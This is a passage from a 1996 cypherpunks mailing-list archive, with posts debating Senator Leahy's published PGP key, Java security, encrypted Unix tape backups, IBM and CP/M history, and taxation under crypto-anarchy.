individual vs. rights of society. Plato, Aristotle, Montesquieu, etc. etc.
Can't swing a dead marsupial without hittin' a philosopher on 'punks 
these days.

> Which reminds me of something I've been meaning to ask about.  I read
> (probably in WiReD) about a bar-code-like (well, not *much* like, but
> ink-on-paper similar) technique for rendering data onto paper with
> enhanced properties of storage efficiency, resistance to degradation
> through photocopying, and ease of recovery via ordinary scanning.  The
> stuff looks like bunches of little lines at different angles, I think.
> Anyway, what I'm curious about is whether encode/decode (i.e., print
> and scan) software is available.
> 
Ah, the modern day version of the Rosetta Stone, unearthed in 
post-nuclear holocaust Peoria ...

> ______c_____________________________________________________________________
> Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
>        m5@tivoli.com * m101@io.com          *
>       <URL:http://www.io.com/~m101>         * suffering is optional
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 3 May 1996 19:26:38 +0800
To: "Bruce M." <cypherpunks@toad.com
Subject: Re: The Joy of Java
Message-ID: <m0uFCmy-0009CTC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:43 PM 5/2/96 -0500, Bruce M. wrote:
>On Wed, 1 May 1996, Dr. Dimitri Vulis wrote:
>
>> My recollection is that when IBM first started selling IBM PC, they offered
>> a choice of (at least) 3 operating systems right from the start: UCSD p-system,
>> CP/M-86 or PC-DOS.  IBM didn't do anything to prompte PC-DOS over the other
>> two. It won fair and square in the marketplace because the other two were
>> even worse crap. (Later versions of CP/M-86 got much better.)
>
>    I always had been under the impression that they charged a hundred 
>dollars or more for CPM as opposed to DOS which was also a major reason 
>for its popularity.
>Bruce Marshall

The story I heard (about 1983) was that IBM had pulled a rather fast one on Digital Research, the source of CP/M for 8080's and CP/M 86.  They lured DR into an exclusive contract in which they offered to pay a percentage of the sales to DR on CP/M 86 for the IBM PC, but then deliberately offered it at such a high price (about $250 or so) that "nobody" wanted it.  Because the contract was "exclusive" even Digital Research was locked out of the market.  By the time that contract expired the market was firmly in the hands of MSDOS. In effect, DR had sold the entire market for a song.  Had they been more careful it might have been a horse race. 

This was identified as an intentional tactic of IBM, BTW.

Jim Bell
jimbell@pacifier.comJim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 3 May 1996 18:56:13 +0800
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: proposed anti-pseudospoofing law in Georgia
Message-ID: <m0uFCmz-0009CUC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:52 PM 5/2/96 -0700, Vladimir Z. Nuri wrote:

>this proposed law in Georgia 
>would make it illegal to have a login name other than 
>your legal name, as I understand it.
>I consider it rather silly, naive, and unenforcable, 
>but it does suggest a few things:
>
>1. lawmakers are starting to notice the internet bigtime.

Yes, they are.

>2. its starting to freak them out.

Apparently, very much so.

>3. the identity issues raised by cyberspace have significant 
>social implications and will not go away quietly.

Not if legislators keep pushing their luck...

>4. there are some legitimate reasons to require ID in some places
>in cyberspace.

Only as far as is mutually agreed.  If two people want to do business, we 
can reasonably expect that they will do so under whatever conditions they 
can agree to.  If one of those conditions is that they require ID from the 
other, fine.  The problem comes when third parties (like, for instance, 
government) requires it; that's wrong.

>meanwhile, if the internet really is robust, their irrelevant
>posturings should not make much difference, although I am *not* 
>advocating that people resign themselves to these laws, only that
>if they pass the situation is not necessarily catastrophic or
>apocalyptic.

I don't think it's apocalyptic.  But that's because I think there's a 
permanent solution to their meddling.

Jim Bell
jimbell@pacifier.com
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 3 May 1996 18:11:32 +0800
To: cypherpunks@toad.com
Subject: Re: Sen. Patrick Leahy's PGP key now avail.
Message-ID: <199605030428.VAA02635@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:23 PM 5/2/96 -0400, perry@piermont.com wrote:
>Timothy C. May writes:
>> Why does anyone need his public key to communicate with Senator Leahy? If
>> it's for sender-anonymity, this does not do it, though other tools
>> (remailers) do.   Unless the information is "secret," why bother?
>
>I would answer Tim, but I suspect that he would ignore something I
>might say. I will therefore quote Philip Zimmermann.
>   Perhaps you think your E-mail is legitimate enough that encryption is
>   unwarranted.  If you really are a law-abiding citizen with nothing to
>   hide, then why don't you always send your paper mail on postcards? 
>   Why not submit to drug testing on demand?  Why require a warrant for
>   police searches of your house?  Are you trying to hide something? 
.....
>Never thought I would see the day where Tim stopped being a
>Cypherpunk. Everyone mark your calendars.

One of the most important parts of any security analysis is the
threat models.  In this case, we're talking about sending email
_to_the_government_.

There may be something you want to tell the Senator or his staff that 
you want kept private from the public or from rest of the government,
and Tim's phrase "Unless the information is 'secret'" seems to cover that.
Maybe you want to say "My company lost $X to competitor Y"; that's private.
Maybe you want to say "The FBI is reading your email, y'know..."
Maybe you want to attach a $20 MarkTwain DigiCash campaign contribution.

But usually, telling the government something is fairly similar to
publishing it, in terms of expectation of privacy, even in a republic.
The tradeoff is between using PGP to make a point, and getting the staff
to read it.  Typically, Congressional Staffs are Your Friends, at least
more directly than the Congresscritters themselves.  Lobby _them_;
making their job easier is a good start.

Maybe the right thing to do is include the digicash, encrypt the message, 
and attach a note indicating that the enclosed digicash is for the staff
member who decrypts the note and gives it to the Senator :-)

#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
begin 777 goodtimes
=96-H;R!H879I;F<@9V]O9"!T:6UE<R!Y970_#0H0
 
end






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 May 1996 19:46:07 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Sen. Patrick Leahy's PGP key now avail.
In-Reply-To: <adaea4ac18021004fc68@[205.199.118.202]>
Message-ID: <199605030223.WAA21946@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Why does anyone need his public key to communicate with Senator Leahy? If
> it's for sender-anonymity, this does not do it, though other tools
> (remailers) do.
> 
> Unless the information is "secret," why bother?

I would answer Tim, but I suspect that he would ignore something I
might say. I will therefore quote Philip Zimmermann.

   Perhaps you think your E-mail is legitimate enough that encryption is
   unwarranted.  If you really are a law-abiding citizen with nothing to
   hide, then why don't you always send your paper mail on postcards? 
   Why not submit to drug testing on demand?  Why require a warrant for
   police searches of your house?  Are you trying to hide something? 
   You must be a subversive or a drug dealer if you hide your mail
   inside envelopes.  Or maybe a paranoid nut.  Do law-abiding citizens
   have any need to encrypt their E-mail?

   What if everyone believed that law-abiding citizens should use
   postcards for their mail?  If some brave soul tried to assert his
   privacy by using an envelope for his mail, it would draw suspicion. 
   Perhaps the authorities would open his mail to see what he's hiding. 
   Fortunately, we don't live in that kind of world, because everyone
   protects most of their mail with envelopes.  So no one draws suspicion
   by asserting their privacy with an envelope.  There's safety in
   numbers.  Analogously, it would be nice if everyone routinely used
   encryption for all their E-mail, innocent or not, so that no one drew
   suspicion by asserting their E-mail privacy with encryption.  Think
   of it as a form of solidarity.

Never thought I would see the day where Tim stopped being a
Cypherpunk. Everyone mark your calendars.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 3 May 1996 18:17:00 +0800
To: cypherpunks@toad.com
Subject: Re: Sen. Patrick Leahy's PGP key now avail.
Message-ID: <199605030527.WAA15742@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  5:50 PM 5/2/96 -0700, Timothy C. May wrote:
>Why does anyone need his public key to communicate with Senator Leahy? If
>it's for sender-anonymity, this does not do it, though other tools
>(remailers) do.

I can think of two good reasons for Senator Leahy to publish his key:

(1) To show his support for the right to use encryption.
(2) To sign open letters to the Internet community.

I will be really impressed when he gets some big-name signatures on his
key.  e.g. Matt Blase, Ron Rivist, PRZ, Tim May.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 3 May 1996 17:28:48 +0800
To: perry@piermont.com
Subject: Re: Burns Bill
Message-ID: <199605030527.WAA15747@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:18 PM 5/2/96 -0400, Perry E. Metzger wrote:
>Bill Frantz writes:
>> in any case, it is not clear how passage of the bill could possibly
>> make things worse.
>
>I think that is key.

I fully agree.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 3 May 1996 18:04:30 +0800
To: hfinney@shell.portal.com>
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
Message-ID: <199605030527.WAA15760@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:34 PM 5/2/96 -0400, Perry E. Metzger wrote:
>At one of my clients, there is a software testing lab where all
>software that is placed on the trading floor is rigorously tested for
>months before it is put out on the users desktop -- it is, indeed,
>tested in conjunction with all other products the user would be
>using. No software is deployed before rigorous testing occurs. By the
>time the thing is put out, it is known to a high degree of certainty
>that it will not cause damage.

My clients have a similar testing setup for new communications software. 
It is one way they are able to offer a reliable service to their clients.

>I would very much prefer a language who's security did not require
>such analysis. Java, sadly, does require such an analysis because it
>requires perfect implementation for its security model to work. In a
>restricted execution environment that was designed with defense in
>depth in mind, such an analysis would be a bonus, but not strictly
>required.

All secure systems require perfect implementation of the security kernel. 
Java has a very large security kernel, since it's kernel includes the
kernel in the underlying operating system.  As such, it is probably not
suited for high security environments.*  However, it may well be secure
enough for individuals to run on their private machines.

* If a Java equipped browser is run in a operating system provided secure
environment, this restriction may not apply.  Such an operating system
would have to provide Orange Book A or B level features (mandatory
security).


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 May 1996 16:58:55 +0800
To: VaX#n8 <vax@linkdead.paranoia.com>
Subject: Re: encrypted Unix backup software
In-Reply-To: <199605030102.UAA06977@linkdead.paranoia.com>
Message-ID: <199605030255.WAA21987@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



VaX#n8 writes:
> Although I could probably hack up "catblock" to do the job, and use
> a line of the form
> dump -0uBf ... | symmetric_cipher | catblock blockfactor > /dev/tape
> if there exists something which already does this job, or something like it,
> I'd like to know.

dd is the program you are looking for.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 3 May 1996 19:46:21 +0800
To: Skippy the Alleged Racist <na572010@anon.penet.fi>
Subject: Re: [Complete NOISE] Re: aufweidersehn, * grave$
In-Reply-To: <199605030508.WAA04132@dns1.noc.best.net>
Message-ID: <Pine.GUL.3.93.960502222357.17644A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ObCpherpunkRelevance: there's a good bit about bizness views of privacy
and anonymity on the Internet on the home page of the class that gave
birth to that Spawn of Satan WhoWhere?. See especially the Bulletins. The
class lives at http://gsb-www.stanford.edu/class/M395/home.html]

ROTFL!!!!! Many thanks to jamesd@echeque.com for forwarding me Skippy's
original message. 

> Glad that lying anti-racist jerk is leaving.  With all his/her's 
> nyms, rc graves is impossible to trust. Mike Beebe, Beowulf,
> ezundel, nietzsche, ernstzundel and others to make transparent
> trolls the ignorant anti-racist makes up.

I've never even heard of Mike Beebe, but I'll look him up on DejaNews. 
Boewulf is the nym of a very real racist who is so over-the-top silly (and
1/4 Jewish) that some people don't believe he's for real. I once claimed
to be "Beowulf" for laughs. "Nietzsche@gnn.com" was a real racist who
spammed widely in early January with a message smearing MLK; he later
posted a lot to news.groups about the rec.music.white-power troll, but
seems to have closed his account once the free hours ran out.
ezundel@alpha.c2.org is a friend of mine who reposts Ingrid's stuff to
alt.fan.ernst-zundel. ernztzundl@aol.com was a really annoying AOL troll
who has thankfully gone away. I've got enough email between him and me to
prove that we're different people, and of course he knew a lot about DC
that I couldn't. 

Wow.

At first I didn't believe that Skippy "or"  Dave Harmon were anything but
anti-racist spoofs, and I'm still not entirely convinced, but they're so
consistently malicious that they must have something against me.  I swear
that "Skippy" isn't me, but on second thought, I wouldn't really mind if
other people thought I was harassing myself. That would be poetic justice
indeed. Maybe if we don't believe he exists, he'll go away. 

So, Skippy, did you forge an unsubscribe message for tallpaul, or was
that someone else? I'll take my answer OFF THE LIST, PLEASE.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYmgIY3DXUbM57SdAQGmwQP+MTp0UTFkSiMKYeIbmQGpAEaC/oMns0ly
Md9IPXBraHAQsxAfWOKME4DUXMaDmL0nUPJ41lRjLH2UjaLYkjE7qEzTWAazLb9+
Ub/EwTNlqitSoOSdkxxQkgX/GXNffRr08pPUpYgcPIcrWelou6MnE2hgmf8aR2bz
gM5eIm1A3Og=
=rO9a
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 3 May 1996 18:51:52 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <199605010521.WAA02990@jobe.shell.portal.com>
Message-ID: <3189A993.A19@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> Netscape with Java cannot be so tested because important components
> come down off the net.  So no, I'm not holding Netscape with Java to a
> higher standard. I'm very much holding it to the same standard.

  The Netscape Administration Kit will allow a site security admin
to create a configuration that disables Java, and does not allow the
user to enable it.  If your customers require netscape, perhaps this
is an option that will make you more comfortable.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sally D. McMillan" <103007.3426@compuserve.com>
Date: Fri, 3 May 1996 16:15:47 +0800
To: IDS <ids@uow.edu.au>
Subject: (fwd) E-Commerce Info. Needed
Message-ID: <960503034747_103007.3426_GHU46-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


I am writing a paper on electronic commerce, and I wonder if anyone happens to
know of interesting URLs addressing the subject, including security issues?
If you know of a good location for electronic commerce/security information,
please email me directly
at the following address:
103007.3426@compuserve.com
THANKS A LOT!! Sally





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 3 May 1996 19:42:23 +0800
To: cypherpunks@toad.com
Subject: Re: Sen. Patrick Leahy's PGP key now avail.
Message-ID: <adaef7221f0210045c56@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:06 AM 5/3/96, Bill Stewart wrote:

>One of the most important parts of any security analysis is the
>threat models.  In this case, we're talking about sending email
>_to_the_government_.
>
>There may be something you want to tell the Senator or his staff that
>you want kept private from the public or from rest of the government,
>and Tim's phrase "Unless the information is 'secret'" seems to cover that.
>Maybe you want to say "My company lost $X to competitor Y"; that's private.
>Maybe you want to say "The FBI is reading your email, y'know..."
>Maybe you want to attach a $20 MarkTwain DigiCash campaign contribution.

And besides my explicit mention of "unless secret," which I suspect is not
the case in the context of "communicating with Sen. Leahy," I also
explicity mentioned that it is unlikely Sen. Leahy is doing the reading of
e-mail or the encrypting. The PGP key is really "Leahy's office key."

I'd say it's 99.95% likely that the PGP key was generated by a staffer--the
resident e-mail geek--and that only staffers know how to use PGP. (In fact,
probably only the one staffer who generated the key and knows the
passphrase....)

This gives new meaning to "man in the channel." When you send an encrypted
message to "Senator Leahy," be sure to tell "Mitch" it's urgent that the
Senator see it!

(Don't misunderstand me, anyone. I'm not expecting perfect security, and
the fact that secretaries and staffers may likely be the actual "keepers of
the keys" is hardly new or surprising. They've always served this role. And
until this changes, with PGP getting easier to use or with a more
conventional key arrangement, I expect few senators will be typing in PGP
stuff.

(By "more conventional" I mean a model where some token or object is used,
as with the crypto ignition keys, which I can imagine _some_ Senators
actually carry and use, depending on their connections to the intelligence
and military establishment. Or biometric security, etc.)

>But usually, telling the government something is fairly similar to
>publishing it, in terms of expectation of privacy, even in a republic.
>The tradeoff is between using PGP to make a point, and getting the staff
>to read it.  Typically, Congressional Staffs are Your Friends, at least
>more directly than the Congresscritters themselves.  Lobby _them_;
>making their job easier is a good start.

I agree. My main point was that staffers are already extremely pressed for
time, often quickly sorting incoming constituent mail into "yes" or "no"
piles for later counting on some issue. It's unlikely in the extreme that a
PGP-encrypted mail message will be looked at, unless the staffer thinks it
must be spook-related. When the staffer finds it's just a position advocacy
letter, and that he spent time decrypting it, it'll likely have the
opposite effect we want.

And it _still_ won't be the "real" Senator Leahy doing the decrypting!

So, what is accomplished except "feel good" thoughts?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rusty H. Hodge" <rusty@hodge.com>
Date: Fri, 3 May 1996 21:28:02 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Sen. Patrick Leahy's PGP key now avail.
In-Reply-To: <199605030428.VAA02635@toad.com>
Message-ID: <v03006601adaf6665cc1e@[157.22.222.199]>
MIME-Version: 1.0
Content-Type: text/plain


It's really annoying when people send files to a mailing list.

It's totally fucking annoying when they do it with each message they post.

Please rethink this.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve <root@bitbucket.edmweb.com>
Date: Sat, 4 May 1996 00:17:33 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Has Tim turned anti-PGP?
In-Reply-To: <adaea4ac18021004fc68@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960503031848.470A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Unless the information is "secret," why bother? It adds extra time at his  
> office's end (you don't think Leahy types in his password to PGP do you?),
> and it accomplishes little.

I agree with you to this point... Personally, I don't encrypt or even sign
anything I send out, unless there is a reason to. For most of the mail I
send out, I don't care if third parties read it, and most of it is so   
unimportant that if it were altered (highly unlikely) I wouldn't care. In
fact, I can't recall the last time I encrypted a message (but I've signed
a couple recently).

> >From a personal viewpoint, I'm glad my key is no longer very accessible. I
> used to get PGP-encrypted messages which had no earthly reason to be 
> encrypted, except that people apparently wanted to practice their PGP

Now that's just plain un-cypherpunk of you. If people want to use PGP, let
them use PGP! There are so many scripts etc. out there to make using PGP
almost transparent, so decrypting your mail shouldn't be any harder than  
pressing a couple keys and typing in your passphrase. (I know, the
passphrase is the killer.)

Whatever happened to "Cypherpunks write code" and getting crypto out
there? It's not enough for it to just be out there, people have to feel
free to use it. Making your pgp key "no longer very accessible" doesn't
exactly support that goal.


Sorry if this is the 1001st reply you recieve.

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBMYncPdtVWdufMXJpAQGowggAivgMhFbR1nMKFz7wWC6h4atBBVHD+jmP
TIf/eBNj0UWXYywgfGdjS+UlrRC+u91nRmon6cWcZ7Zg5ctl0uNH6Ts162q3F3pH
GjoismTYqVFhQZMNwGI60mXUqoQShfmQz9GUX/gU9HWta7pY7xOGVwJJwL5jkAHW
ru1GtkLKVzr1ajYW+mg8Zrh+XsFTa8ruFEqN/eCx/AtOIXEmACj4qiwtDTC4WNXQ
uDWjwSeDmtn1uS121PkUdw18uzl7mV7TpBbUJojWQACC+tW5GXeyh+2aziP8WIpM
qqQyOQJ1UYzTIlXb8IBefwdsPlvKBvEaJdpmtwYLteCHMpsqSvGovQ==
=dEm6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@vplus.com (Dan Weinstein)
Date: Fri, 3 May 1996 16:15:00 +0800
To: cypherpunks@toad.com
Subject: Re: Sen. Patrick Leahy's PGP key now avail.
In-Reply-To: <v01510101adaea22996f6@[38.12.5.30]>
Message-ID: <318980a4.4746046@mail.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 2 May 1996 17:36:13 -0400, you wrote:

>Wanna write the good Senator on the occasion of his newest bill? His pub
>key's out there. (URL is  http://bs.mit.edu:8001/pks-commands.html#submit/

Is he the first Senator/Congressman to publicly release a PGP key?


Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 3 May 1996 23:17:00 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Sen. Patrick Leahy's PGP key now avail.
In-Reply-To: <adaef7221f0210045c56@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960503043120.23243A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 2 May 1996, Timothy C. May wrote:

> At 5:06 AM 5/3/96, Bill Stewart wrote:

> I'd say it's 99.95% likely that the PGP key was generated by a staffer--the
> resident e-mail geek--and that only staffers know how to use PGP. (In fact,
> probably only the one staffer who generated the key and knows the
> passphrase....)

While I believe this correct, it's worth noting that Leahy is fairly
"into" the technology.  He finds it entertaining and "fun."  All of this
mostly thanks to his one time counsel John Podesta.  Thanks Mr. Podesta!

He's one of the more interested congress critters.

> So, what is accomplished except "feel good" thoughts?

Admittedly, not much.  I'm at least pleased he has a decently on the ball
staff however who can tell him what the issues are.


> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ecafe Mixmaster Remailer <mixmaster@remail.ecafe.org>
Date: Fri, 3 May 1996 19:50:04 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605030525.GAA21397@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


> From: Brian D Williams <talon57@well.com>
> Date: Thu, 2 May 1996 11:16:35 -0700
> 
> >From cypherpunks-errors@toad.com Tue Apr 30 23:58:28 1996
> >Date: Wed, 1 May 1996 00:52:03 -0500 (CDT)
> >From: snow <snow@smoke.suba.com>
> >To: "Perry E. Metzger" <perry@piermont.com>
> >cc: "L. Detweiler" <vznuri@netcom.com>, cypherpunks@toad.com
>      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
> >MIME-Version: 1.0
> >Content-Type: TEXT/PLAIN; charset=US-ASCII
> >Sender: owner-cypherpunks@toad.com
> >Precedence: bulk
> 
> Game, set, match......

No, probably done intentionally.  Note the lower-case snow...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Loomis <ml3e+@andrew.cmu.edu>
Date: Sat, 4 May 1996 02:13:28 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <Pine.SUN.3.93.960502012945.614A-100000@polaris.mindport.net>
Message-ID: <ElWSW6y00iWWM1ZWIa@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 2-May-96 Re: CryptoAnarchy: What's
w.. by Black Unicorn@schloss.li 
> I must assume either
> 
> 1) He is not intimately familiar with the system of U.S. taxation (even if
> he is pro-high-tax, calling the current system 'just about right' is
> folly).

No tax system will ever been perfect, but  income taxation is a good
system of taxation.  Income taxation inevitably requires some accounting
costs, but these costs should be going down with advances in computing
technology and other technology.  The goal should be to minimize these
costs.  I would further suggest it is remarkably childish to think that
a political system will not cause some unfairness in the tax code,
because it is the nature of democracy to generate some unfairness.  As
long as the unfairness is kept within reasonable bounds as in the case
of the 1986 tax reform, I don't see that this unfairness as a killing
objection to income taxation.  Of course, unlike most of the readership
of this list, I believe that democracy is a good thing.

The one concession that I will make is the possibility that crypto
technologies could make income taxation an adventure in unfairness and
ultimately futility.  While, I prefer income taxation, VATs or sales
taxes are an acceptable subsitute and one can certainly run a reasonable
sized government on them.  Outside of crypto-cyber-carrots, I have
strong doubts that crypto of any form or sophistication will be able to
circumvent consumption taxation.  Consumption taxation would, of course,
include a tax on the amount of information coming into your computer.  I
don't think that the government will have any problem determining the
quantity of the information & since it will be encrypted anyway, I don't
see the privacy worries.

Michael Loomis
"La haine de l'autorite' est le fle'au de nos jours."  Joseph de Maistre




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VaX#n8 <vax@linkdead.paranoia.com>
Date: Sat, 4 May 1996 23:33:58 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: encrypted Unix backup software
In-Reply-To: <199605030425.XAA05924@primus.paranoia.com>
Message-ID: <199605031253.HAA09103@linkdead.paranoia.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199605030425.XAA05924@primus.paranoia.com>, Bill Stewart writes:
>>Although I could probably hack up "catblock" to do the job, and use
>>a line of the form
>>dump -0uBf ... | symmetric_cipher | catblock blockfactor > /dev/tape

>Yup [agrees on cmdline]
>You don't need to write "catblock", though - there's the "dd" command
>designed for just such applications...
>Newer versions may handle multiple tapes a bit better.

Hmm, I've got this a few times from people and I just wanted to clear
up a few points.
1) BSD dd doesn't treat EOT specially:
   /* ... If a partial write, and it's a character device, just warn.
          If a tape device, quit. ... */
   GNU dd (from what I remember) doesn't, either.
2) "dd" will only work safely across all tape types and all size pipes
   using the degenerate form "dd ibs=1 obs=(your_bf_here) conv=sync ...".

I'll hack up catblock today.  Who says we don't code :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 4 May 1996 07:57:31 +0800
To: Michael Loomis <cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <199605031505.IAA15514@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:05 AM 5/3/96 -0400, Michael Loomis wrote:
>No tax system will ever been perfect, but  income taxation is a good
>system of taxation.  Income taxation inevitably requires some accounting
>costs, but these costs should be going down with advances in computing
>technology and other technology. 

The income tax necessarily violates privacy in ways that were 
thought outrageous a few when it was first introduced.  There 
were numerous cartoons on the subject, but people accepted it 
because only the rights of a tiny handful of very rich people 
were going to to be violated.  (I hear the same argument all 
the time on the privacy list, where lots of people want the 
government to have root access to the computers of the evil 
capitalist overlords in order that the government can protect 
their privacy.)

As our capacity to protect our privacy and still engage in 
complex extended transactions improves, I expect that once 
again the income tax will come to be seen as an intolerable 
and utterly unacceptable violation of peoples rights and
future generations will be amazed at our ignorant barbarity.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 May 1996 06:37:54 +0800
To: jsw@netscape.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <3189A993.A19@netscape.com>
Message-ID: <199605031303.JAA24332@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
